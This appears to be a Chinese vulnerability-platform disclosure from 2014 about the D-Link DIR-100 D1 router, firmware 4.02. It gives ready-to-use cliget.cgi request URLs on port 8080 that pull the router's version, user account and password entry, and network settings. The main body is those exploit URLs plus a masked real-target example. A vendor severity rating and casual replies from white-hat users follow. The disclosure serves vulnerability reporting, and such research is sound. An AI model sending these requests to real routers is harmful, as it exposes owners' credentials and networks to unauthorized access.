D-Link某款命令执行可获取路由密码等信息

版本：DIR-100 D1 4.02

获取路由版本信息

http://地址:8080/cliget.cgi?cmd=$sys_model%;$hw_cver%;$sw_ver%;

获取路由帐号密码等信息

http://地址:8080/cliget.cgi?cmd=$sys_user1%;$lan_ip%;$lan_msk%;status%20wan_ip%;status%20wan_mask%;status%20wan_gw%;status%20dns1%;status%20dns2%;

案例：

**.**.**.**/cliget.cgi?cmd=$sys_user1%;$lan_ip%;$lan_msk%;status%20wan_ip%;status%20wan_mask%;status%20wan_gw%;status%20dns1%;status%20dns2%;

。。

厂商回应：

危害等级：中

漏洞Rank：10

确认时间：2014-07-09 13:33

厂商回复：

与一并处置。rank 10

最新状态：

暂无

1. 2014-07-04 19:13 | zeracker ( 普通白帽子 | Rank:1077 漏洞数:139 | 爱吃小龙虾。)

   0

   洞主上瘾了了...我看出来了

   1# 回复此人

2. 2014-07-04 19:20 | YY-2012 ( 核心白帽子 | Rank:3861 漏洞数:736 | 意淫，是《红楼梦》原创的词汇，但后来演变...)

   0

   @zeracker 亲，失业啊！现在就是找点事而已

   2# 回复此人

3. 2014-07-04 19:21 | 袋鼠妈妈 ( 普通白帽子 | Rank:449 漏洞数:61 | 故乡的原风景.MP3)

   0

   .....撸了这么多,楼主买了多少纸巾啊?

   3# 回复此人

4. 2014-07-04 20:46 | 带馅儿馒头 ( 核心白帽子 | Rank:1399 漏洞数:157 | 心在，梦在)

   0

   果断关注，我经常忘了路由密码 ：（

   4# 回复此人

5. 2014-07-04 22:10 | Z-0ne ( 普通白帽子 | Rank:559 漏洞数:38 | 目前专注于工控安全基础研究，工业数据采集...)

   0

   看好洞主~

   5# 回复此人

6. 2014-07-05 10:51 | zeracker ( 普通白帽子 | Rank:1077 漏洞数:139 | 爱吃小龙虾。)

   0

   @YY-2012 乌云众测一下

   6# 回复此人

7. 2014-10-03 00:08 | 付弘雪 ( 路人 | Rank:16 漏洞数:10 | 希望和业内各位大牛多多交流)

   0

   @YY-2012 洞主专业各种 路由器啊，最近

   7# 回复此人